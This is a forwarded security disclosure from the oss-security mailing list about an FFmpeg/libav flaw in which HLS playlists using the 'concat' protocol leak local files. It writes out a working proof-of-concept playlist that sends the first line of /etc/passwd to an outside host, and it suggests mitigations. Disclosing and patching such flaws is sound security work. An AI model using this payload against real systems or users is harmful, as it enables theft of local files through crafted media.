Date: Wed, 13 Jan 2016 14:01:55 +0300 From: Vladimir Dubrovin <vlad@...urityvulns.ru> To: oss-security@...ts.openwall.com Subject: Fwd: FFmpeg: stealing local files with HLS+concat ---------- Forwarded message ---------- From: Максим Андреев <andreevmaxim@...il.com> Date: 13 January 2016 at 13:41 Subject: FFmpeg: stealing local files with HLS+concat To: oss-security@...ts.openwall.com Hello! I found some strange behavior in ffmpeg which can lead to stealing local files during ffmpeg/ffprobe exec, it's also applied to libav. I've underestimated the impact of this bug, so it was full disclosured in this article (Russian language, but google translate works fine with it) - http://habrahabr.ru/company/mailru/blog/274855 In short: if linux user download specially prepared video file (with any extension: avi/mov/etc..) which contains HLS m3u8 playlist with "concat" protocol in url:, #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://dx.su/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST header.m3u8: #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://example.org? If user launches ffmpeg-based video player (MPlayer, etc..), first line of /etc/passwd will be sent to http://example.org? in http://example.org?# $FreeBSD: release/100.0/et.. request. The same happens when file manager tries to generate thumbnail for this file. All this can be applied to server-run ffmpeg during video conversion. FFmpeg/libav security teams are already notified, but official patches are not available yet, so you can rebuild ffmpeg with --disable-network configure option which prevents this vulnerability from being exploited. Moreover, it's always recommended to run ffmpeg in isolated environment when processing untrusted files (googleonlinesecurity.blogspot.ru/2014/01/ffmpeg-and-thousand-fixes.html) -- Maxim Andreev
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ